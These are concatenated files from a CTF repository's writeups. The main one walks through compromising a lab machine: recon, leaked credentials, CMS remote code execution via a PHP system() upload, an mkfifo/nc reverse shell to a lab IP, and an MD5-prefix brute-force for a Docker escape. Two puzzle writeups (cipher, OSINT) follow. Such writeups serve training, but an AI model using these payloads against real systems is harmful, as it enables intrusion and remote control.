Escape/images/2024-09-25_17h30_48.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h36_49.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h36_49.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h38_46.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h38_46.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_16.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_31.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_31.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_50.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h39_50.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_34.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h41_42.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h45_54.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h45_54.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h54_27.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h54_27.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h12_04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h12_04.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h22_19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h22_19.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h24_52.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h24_52.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h30_58.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h30_58.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h33_34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h33_34.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h34_12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h34_12.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h35_11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h35_11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h56_23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_18h56_23.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-27_22h13_01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-27_22h13_01.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/README.md: -------------------------------------------------------------------------------- 1 | Exploit the vulnerabilies and gain root access to the machine. -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/Writeup.md: -------------------------------------------------------------------------------- 1 | # INFO 2 | 3 | This CTF was designed by Elnur Badalov and was Challenge №12 in ICSD's CTF event "Who am I" held on `20.09.2024`. 4 | 5 | This write-up will show the solution to this CTF challenge. 6 | 7 | # Reconnaissance 8 | ## NMAP Scan 9 | ```bash 10 | nmap -p- -sS -sC -sV 10.0.10.25 -v --min-rate 10000 11 | # result 12 | PORT STATE SERVICE VERSION 13 | 21/tcp open ftp vsftpd 2.3.4 14 | | ftp-syst: 15 | | STAT: 16 | | FTP server status: 17 | | Connected to 10.255.1.18 18 | | Logged in as ftp 19 | | TYPE: ASCII 20 | | No session bandwidth limit 21 | | Session timeout in seconds is 300 22 | | Control connection is plain text 23 | | Data connections will be plain text 24 | | At session startup, client count was 3 25 | | vsFTPd 2.3.4 - secure, fast, stable 26 | |_End of status 27 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 28 | |_Cant get directory listing: PASV IP 172.17.0.2 is not the same as 10.0.10.25 29 | 22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0) 30 | | ssh-hostkey: 31 | | 256 43:eb:24:ea:01:e5:d2:e0:55:4d:37:95:3c:ac:6a:6e (ECDSA) 32 | |_ 256 97:33:4e:15:41:32:8c:32:86:6c:c3:b6:5c:be:fa:d9 (ED25519) 33 | 80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12) 34 | |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 35 | | http-title: CMC - A test post to test CMS 36 | |_Requested resource was http://10.0.10.25/wbce/ 37 | |_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD 38 | |_http-generator: WBCE CMS; https://wbce.org 39 | | http-methods: 40 | |_ Supported Methods: GET HEAD POST OPTIONS 41 | 3389/tcp open ms-wbt-server Microsoft Terminal Services 42 | | ssl-cert: Subject: commonName=WINDOCL-GI0DS47 43 | | Issuer: commonName=WINDOCL-GI0DS47 44 | | Public Key type: rsa 45 | | Public Key bits: 2048 46 | | Signature Algorithm: sha256WithRSAEncryption 47 | | Not valid before: 2024-09-11T00:50:52 48 | | Not valid after: 2025-03-13T00:50:52 49 | | MD5: 8043:0cbe:6a96:c2d8:61fb:7dea:c545:61df 50 | |_SHA-1: 2771:80d5:854a:3296:0f47:7072:934c:86d1:a095:44fd 51 | |_ssl-date: 2024-09-23T06:33:02+00:00; 0s from scanner time. 52 | | rdp-ntlm-info: 53 | | Target_Name: WINDOCL-GI0DS47 54 | | NetBIOS_Domain_Name: WINDOCL-GI0DS47 55 | | NetBIOS_Computer_Name: WINDOCL-GI0DS47 56 | | DNS_Domain_Name: WINDOCL-GI0DS47 57 | | DNS_Computer_Name: WINDOCL-GI0DS47 58 | | Product_Version: 10.0.20348 59 | |_ System_Time: 2024-09-23T06:33:01+00:00 60 | ``` 61 | 4 ports are open: 62 | - 21 - `vsftpd 2.3.4`. It has a Public Exploit for getting an RCE. 63 | - 22 - ssh. 64 | - 80 - a web app - CMS. 65 | - 3389 - RDP. It may mean that there is Windows machine. 66 | ## FTP Reveals a Hidden File 67 | 68 | FTP allows anonymous login, and we find a hidden file `.note.txt`. We can download it using the `get` command. 69 | ![image](./images/ftp-session.png) 70 | It has the following note:\ 71 | ``` 72 | You could ask me to give you a virtual machine in the Cloud. Why are you doing such weird thing, Mr. Windoclin? Who setups Windows Server that way? 73 | 74 | Additionally, add me to the Github Repository as a Contributor. 75 | ``` 76 | Here, we learn that the user's name is `Windoclin` and he did something extraordinary with Windows. Additionally, he may have a GitHub account. 77 | 78 | ### Rabbit Hole 79 | 80 | Although the FTP service seems exploitable (vsftpd 2.3.4 has a public exploit for backdoor command execution via CVE-2011-2523), it is a **rabbit hole** and won’t be useful. 81 | ## Github OSINT 82 | Searching for `windoclin` on GitHub reveals a repository that points to his profile. 83 | ![image](./images/github-osint.png) 84 | We discover another repo called *autotask*: 85 | - https://github.com/windoclin/autotask 86 | ![image](./images/github-osint-2.png) 87 | It contains automation scripts that leak credentials: 88 | ![image](./images/github-osint-3.png) 89 | ```python 90 | ... 91 | username = "supascrtadminus3r" 92 | password = "supascrtp4ssw0rd!!" 93 | ... 94 | ``` 95 | # CMS 96 | ## Recon 97 | When we send a GET request to the IP, it redirects to `http://10.0.10.25/wbce/`. 98 | ![image](./images/cms-redirects.png) If we request the new URL again (or navigate to it in a browser), we see it requires resources from `http://windoclin/wbce`. This indicates we need to add the `windoclin` hostname to the `/etc/hosts` file. 99 | ![image](./images/cms-hostname-revealed.png) `wbce` in the URL suggests that the CMS in use is WBCE. 100 | ![image](./images/wbce-cms.png) This CMS does exist, and it has several exploits available. 101 | ![image](./images/wbce-cms-googled.png) 102 | ## CMS Admin Access 103 | By checking some common directory names, we can find the **admin portal** of the CMS, where we can log in using the credentials found earlier. ![image](./images/cms-admin-panel.png) From the admin dashboard, we find the following information: `WBCE Version: 1.6.2`. 104 | ## RCE 105 | We use the following exploit: 106 | - https://github.com/capture0x/WBCE_CMS/ 107 | 108 | To get RCE, navigate to **Add-ons**, then **Languages**, and **install a language**. 109 | ![image](./images/cms-admin-dashboard.png) 110 | Let’s try a simple payload: 111 | ```php 112 | <?php system('whoami');?> 113 | ``` 114 | Write this to a PHP file, upload it, and click **Install**. 115 | ![image](./images/cms-rce.png) 116 | The exploit succeeded! We got `nt authority\system`, which grants the highest privilege on the system. 117 | ### Reverse Shell 118 | For a reverse shell, I used this exploit: 119 | - https://github.com/ivan-sincek/php-reverse-shell 120 | Modify port and IP and repeat the steps: 121 | ![image](./images/cms-reverse-shell.png) 122 | # Windows Enumeration 123 | Let's check Desktop of the **windoclin** user: 124 | ![image](./images/windows-enum.png) 125 | We find a shortcut to a folder located in a network share: `\\host.lan`. 126 | ```powershell 127 | net view \\host.lan 128 | # gives 129 | ... 130 | Data Disk Shared 131 | ... 132 | 133 | # next, mount the share 134 | net use Z: \\host.lan\Data 135 | 136 | # cd there 137 | Z: 138 | Z:\>dir 139 | Volume in drive Z is Data 140 | Volume Serial Number is AC24-E051 141 | 142 | Directory of Z:\ 143 | 144 | 09/12/2024 09:19 AM <DIR> . 145 | 09/12/2024 09:19 AM <DIR> .. 146 | 09/12/2024 02:36 AM 21,846,505 1.6.2.zip 147 | 09/12/2024 09:12 AM 2,468 healthy.sh 148 | 09/12/2024 10:25 AM 665 prevention.sh 149 | 09/12/2024 09:19 AM 166 README.MD 150 | 09/11/2024 10:19 AM 7 user.txt 151 | 01/30/2024 11:47 PM <DIR> WBCE_CMS-1.6.2 152 | ``` 153 | Congratulations! We found `user.txt`! 154 | ![image](./images/windows-shared-folder.png) 155 | # Windows Docker Escape 156 | Three files interest us: 157 | - `README.MD` 158 | - It contains `6238383731656632663334623638393836333933353130373530653833323635` which is `b8871ef2f34b68986393510750e83265` decoding from HEX. 159 | ````markdown 160 | # A Note from Mr. Windoclin 161 | ``` 162 | 6238383731656632663334623638393836333933353130373530653833323635 163 | ``` 164 | 165 | Do not modify the `healthy.sh`, otherwise it will not run**!** 166 | ```` 167 | - `prevention.sh` 168 | - This is a custom script designed to prevent another script from being executed if it’s been overwritten. 169 | ```bash 170 | #!/bin/bash 171 | 172 | if [ "$#" -ne 2 ]; then 173 | echo "Usage: $0 <script_to_run> <expected_md5_prefix>" 174 | exit 1 175 | fi 176 | 177 | script_to_run=$1 178 | the_md5=$2 179 | 180 | if [ ! -f "$script_to_run" ]; then 181 | echo "Error: The script '$script_to_run' does not exist." 182 | exit 1 183 | fi 184 | 185 | actual_md5_prefix=$(md5sum "$script_to_run" | awk '{print $1}' | cut -c 1-4) 186 | expected_md5_prefix=$(echo "$the_md5" | awk '{print $1}' | cut -c 1-4) 187 | 188 | if [ "$actual_md5_prefix" == "$expected_md5_prefix" ]; then 189 | echo "MD5 checksum matches. Running the script..." 190 | bash "$script_to_run" 191 | else 192 | echo "MD5 checksum does not match. Expected '$expected_md5_prefix', but got '$actual_md5_prefix'." 193 | exit 1 194 | fi 195 | ``` 196 | - `healthy.sh` 197 | - This script runs regular health checks. Using the following command, we can get its MD5 checksum: 198 | ```powershell 199 | certutil -hashfile .\healthy.sh MD5 200 | # result 201 | MD5 hash of .\healthy.sh: 202 | b8871ef2f34b68986393510750e83265 203 | ``` 204 | 205 | The MD5 hash `b8871ef2f34b68986393510750e83265` matches the one in the `README.MD` file. 206 | 207 | Overall, the mechanism implemented here is used for performing regular health checks from a machine that connects to the shared folder. Additionally, it employs an *insecure* method for preventing the execution of an overwritten file, as it only checks the first 4 characters of the MD5 hash. This makes it vulnerable to a brute-force attack using the following script: 208 | 209 | `brute.sh` 210 | ```bash 211 | #!/bin/bash 212 | 213 | # prepare the payload 214 | FILE_PATH="shell.sh" 215 | echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.0.10.35 4444 >/tmp/f' > $FILE_PATH 216 | 217 | TARGET_CHECKSUM="b887" 218 | 219 | # add '#' to the end of shell file till first 4 characters are match 220 | while true; do 221 | CURRENT_CHECKSUM=$(md5sum "$FILE_PATH" | awk '{ print $1 }' | cut -c 1-4) 222 | 223 | if [ "$CURRENT_CHECKSUM" == "$TARGET_CHECKSUM" ]; then 224 | echo "The file's checksum now matches the target: $CURRENT_CHECKSUM" 225 | break 226 | fi 227 | 228 | echo -n "#" >> "$FILE_PATH" 229 | 230 | done 231 | ``` 232 | After creating `shell.sh`, transfer it onto the target machine, which can be done via a Python server. 233 | ![image](./images/prepare-exploit.png) 234 | 235 | Then, on the target machine, replace the file in `Z:/`: 236 | ```powershell 237 | Invoke-WebRequest -Uri http://10.0.10.35:8000/shell.sh -OutFile healthy.sh 238 | ``` 239 | 240 | Set up a listener and wait for a connection. 241 | 242 | Finally, voilà! We successfully obtain a shell and retrieve `root.txt`! 243 | ![image](./images/machine-exploited.png) 244 | # Conclusion 245 | By exploring further, we can find a `docker-compose.yml` file, which reveals that **Windows** is running as a **Docker container** on a **Linux** host. The shared folder we accessed earlier is mounted between the Linux host and the Docker container. 246 | ![image](./images/docker-compose-file.png) 247 | ![image](./images/shared-folder.png) 248 | 249 | This was a non-standard Docker escape technique that leveraged weak file integrity checks. 250 | 251 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-dashboard.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-panel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-admin-panel.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-hostname-revealed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-hostname-revealed.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-rce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-rce.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-redirects.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-redirects.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-reverse-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/cms-reverse-shell.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/docker-compose-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/docker-compose-file.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/ftp-session.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/ftp-session.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint-3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/github-osint.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/machine-exploited.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/machine-exploited.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/prepare-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/prepare-exploit.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/shared-folder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/shared-folder.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms-googled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms-googled.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/wbce-cms.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-enum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-enum.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-shared-folder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C12 - Mr. Windoclin/images/windows-shared-folder.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/README.md: -------------------------------------------------------------------------------- 1 | # Decode the Escape 2 | 3 | Find the Flag. 4 | 5 | ```plaintext 6 | "Some will call it practice, some will call that luck, 7 | But either way you're going to the history books" 8 | 9 | L4wTKLUUxgtfNz7yudA2zCGaujhZ7WwGkFZbAJAgwReuTEbZ4szScUXXDkxacmaNXcs7GpELSRdx8WbCBwC6SZtGtBMFfJspjGU2SQayckz7sFErDCq2bf79jNqf3yi1EyU8hrvw9LRQWakKJHYkgcoGa7ub6NkSD8hAxTTmHVjvp4y9YP9C79y9fFASJiU4xj2Xp54WPHf8x5HkCo5d2jDEqSVUXU9hXAbTrX6K3fTRFr69FEvWMCntQmS1UCCiHvEEuHxVgvJhVRAhyS8pLkppSRNt6QY1EmZKDHwWeP7kyCx9w8gm6Nf74X2VyfGWABBunvrWtDN6sh5SetHCYLMvtbpwLaoVMeN5VTG8tUAutiK61NARaMZTmWGWki2wqaMmZAKiLoPHA3hXBkoLLTXd9cdWZVT1SSSWuCH4QmszSvL2TtjaugVFmCMejehVPufSaojNCyepsjRR8Q5cSYwqcEAHL81iNVUXPFoV3xUdgJAxzVfL3QsnDLeTyex 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/Writeup.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | First of all, we need to search for the song lyrics given in the task. It’s the song called **Hall of Fame** by The Script: 4 | 5 | ![alt text](images/figure-1.png) 6 | 7 | The secret message given to us is Base58 encoded value: 8 | 9 | ![alt text](images/figure-2.png) 10 | 11 | It looks like a cipher. As we are given a song that can be used for some purposes, we can guess that the ciphertext is a result of the Vigenere cipher. 12 | 13 | ***But what is the key?*** 14 | 15 | Let’s try the song name - “**halloffame**” - and see the result: 16 | 17 | ![alt text](images/figure-3.png) 18 | 19 | Yes, it is the right key! We are given another message: 20 | 21 | **“Happiness can be found, even in the darkest of times, if one only remembers to turn on the light.”** 22 | 23 | **How can you fight off this prison's guards?** 24 | 25 | The first quote is from the “Harry Potter and The Prisoner of Azkaban”, which can be found with a little Google search: 26 | 27 | ![alt text](images/figure-4.png) 28 | 29 | As we can guess, the Azkaban is a prison name. So we need to conduct another search to find out how we can fight off the guards of this prison? 30 | 31 | The guards of Azkaban are called **Dementors**: 32 | 33 | ![alt text](images/figure-5.png) 34 | 35 | We can fight off Dementors with… 36 | 37 | ![alt text](images/figure-6.png) 38 | 39 | The Patronus Charm! Good. We collected some information, so let’s analyze the secret message. It is another Base64-encoded value: 40 | 41 | ![alt text](images/figure-7.png) 42 | 43 | Well, it does not work. We have to look for another way. 44 | 45 | However, searching for the Patronus charm in Google would give something juicy: 46 | 47 | ![alt text](images/figure-8.png) 48 | 49 | Let’s raise the wands and say the magic words: 50 | 51 | ![alt text](images/figure-9.png) 52 | 53 | The spell worked! Challenge solved! 🪄🪄🪄 54 | 55 | Flag: **`ICSD_2024{a9Vb44x55wLt4Pn8KrHd}`** -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/README.md: -------------------------------------------------------------------------------- 1 | **C3 - ANAIS_WATT3RS0N** 2 | 3 | *Anais Watterson's beloved donkey doll, was thrown from a school bus by other children. Unfortunately, Anais has lost not only a beloved toy but also a hidden flag within it that holds great importance to her. Now she needs your assistance to retrieve it. Anais has created a Twitter account to share clues and reach as many people as possible to aid in the search. Your mission is to retrace the hints, find the doll, and bring it back. Ready to help Anais recover her treasured possession and restore her smile?* 4 | 5 | ![image.png](images/image1.png) 6 | -------------------------------------------------------------------------------- /Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/Writeup.md: -------------------------------------------------------------------------------- 1 | # C3 - ANAIS_WATT3RS0N 2 | 3 | Here we see that in the description it's mentioned that Anais created a Twitter account and name of the challange looks like a challange name. We search it on Twitter (R.I.P.), and we see an account: 4 | 5 | ![image.png](images/image2.png) 6 | 7 | Browsing through it, we noticed that Anais first asked for help, and later found some strange, unreadable text stuck to her door: 8 | 9 | ![image.png](images/image3.png) 10 | 11 | From its format, we suspected it might be encoded in one of the Base encoding types, so we used CyberChef (https://gchq.github.io/CyberChef/) to decode it: 12 | 13 | ![image.png](images/image4.png) 14 | 15 | Voilà! We finally cracked it. It revealed the name of a location: Mare Island San Pablo Bay Hiking Trail. We searched for it on Google Maps: 16 | 17 | ![image.png](images/image5.png) 18 | 19 | Usually, in these kinds of puzzles, we find interesting clues in the comments section, so we looked there (sorted by newest): 20 | 21 | ![image.png](images/image6.png) 22 | 23 | That's when we discovered that Tina, the fearsome bully of Elmore Junior High, had taken Anais's doll. But did you know Tina did it because she couldn't sleep at night? Now you know both the flag and the reason behind her actions. -------------------------------------------------------------------------------- /Who 